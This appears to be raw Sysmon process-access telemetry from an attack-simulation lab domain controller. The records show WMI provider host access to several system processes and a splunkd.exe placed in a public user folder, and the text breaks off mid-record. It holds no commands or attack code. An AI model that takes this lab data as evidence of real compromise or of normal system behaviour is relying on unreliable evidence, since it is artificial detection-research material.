{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5626,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01B6-5F25-0000-00101A7C0100}\r\nTargetProcessId: 2352\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01B6-5F25-0000-00101A7C0100}","TargetProcessId":"2352","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5627,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01BD-5F25-0000-00108F930200}\r\nTargetProcessId: 3048\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01BD-5F25-0000-00108F930200}","TargetProcessId":"3048","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5628,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01BD-5F25-0000-0010D0930200}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01BD-5F25-0000-0010D0930200}","TargetProcessId":"3056","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5629,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5630,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001076B50200}","TargetProcessId":"2440","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5631,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001066B80200}\r\nTargetProcessId: 2748\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001066B80200}","TargetProcessId":"2748","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5632,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00106FB80200}\r\nTargetProcessId: 2752\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00106FB80200}","TargetProcessId":"2752","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\